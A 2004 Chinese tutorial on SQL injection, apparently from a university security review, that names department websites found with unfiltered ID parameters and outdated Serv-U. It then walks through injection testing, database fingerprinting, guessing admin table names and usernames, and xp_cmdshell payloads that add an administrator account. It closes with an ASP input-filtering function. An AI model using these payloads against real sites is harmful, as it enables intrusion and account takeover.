SQL注入漏洞全接触

SQL注入漏洞全接触2004-5-111网站评比中发现的问题经济学院 serv-u版本太低，对于新闻的ID传入没有进行过滤,网上办公系统也有很大漏洞 外文学院 ID传入没有进行过滤 软件学院 站内搜索没有对'进行过滤 台湾研究院 ID传入没有进行过滤,开放SMTP,NNTP等不必要服务 管理学院 serv-u版本太低，SMTP匿名发送，ID传入没有进行过滤 厦大医院 ID传入没有进行过滤 党委宣传部 ID传入没有进行过滤 化学化工学院 ID传入没有进行过滤 校工会 ID传入没有进行过滤 党委组织部 ID传入没有进行过滤 职业技术学院 ID传入没有进行过滤 图书馆 ID传入没有进行过滤 国际处 ID传入没有进行过滤 人事处 ID传入没有进行过滤 法学院 ID传入没有进行过滤,serv-u版本太低 资产与后勤事务管理处 ID传入没有进行过滤 2ＳＱＬ注入原理‘MicrosoftOLEDBProviderforODBCDrivers错误'80040e14'[Microsoft][ODBCMicrosoftAccessDriver]字符串的语法错误在查询表达式'id=772''中。/displaynews.asp，行31说明:

数据库为Access程序没有对于id进行过滤数据库表中有个字段名为id3判断能否进行ＳＱＬ注入1.and1=12.and1=2如果1显示正常,2显示错误,或者没有页面,则表明可以进行SQL注入4判断数据库类型anduser>0 user是SQLServer的内置变量 1.and(selectcount(*)fromsysobjects)>0

2.and(selectcount(*)frommsysobjects)>0如果1正常,则表示Sqlserver.5注入方法(A)ID=49这类注入的参数是数字型，SQL语句原貌大致如下：

Select*from表名where字段=49

注入的参数为ID=49And[查询条件]，即是生成语句：

Select*from表名where字段=49And[查询条件]

(B)Class=连续剧这类注入的参数是字符型，SQL语句原貌大致概如下：

Select*from表名where字段=’连续剧’

注入的参数为Class=连续剧’and[查询条件]and‘’=’，即是生成语句：

Select*from表名where字段=’连续剧’and[查询条件]and‘’=’’

(C)搜索时没过滤参数的，如keyword=关键字，SQL语句原貌大致如下：

Select*from表名where字段like’%关键字%’

注入的参数为keyword=’and[查询条件]and‘%25’=’，即是生成语句：

Select*from表名where字段like’%’and[查询条件]and‘%’=’%’6猜表名ID=49And(SelectCount(*)fromAdmin)>=0表名猜出来后，将Count(*)替换成Count(字段名)，and(selecttop1len(username)fromAdmin)>0猜用户名长度and(selecttop1asc(mid(username,1,1))fromAdmin)>0猜用户名

7利用系统表注入SQLServer数据库id=1;execmaster..xp_cmdshell“netusernamepassword/add”–创建系统用户Id=1;execmaster..xp_cmdshell“netlocalgroupnameadministrators/add”--

把该用户加入administrators组id=1;backupdatabase数据库名todisk=’c:\inetpub\\1.db’;--

备份数据库…..8绕过程序限制继续注入wherextype=’U’wherextype=char(85)9防范方法FunctionSafeRequest(ParaName,ParaType)

'---传入参数---

'ParaName:参数名称-字符型

'ParaType:参数类型-数字型(1表示以上参数是数字，0表示以上参数为字符)

DimParaValue

ParaValue=Request(ParaName)

IfParaType=1then

IfnotisNumeric(ParaValue)then

Response.write"参数"&ParaName&"必须为数字型！"

Response.end

Endif

Else

ParaValue=replace(ParaValue,"'","''")

Endif

SafeRequest=ParaValue

Endfunction10加强SQLServer安全IP安全策略里面,将TCP1433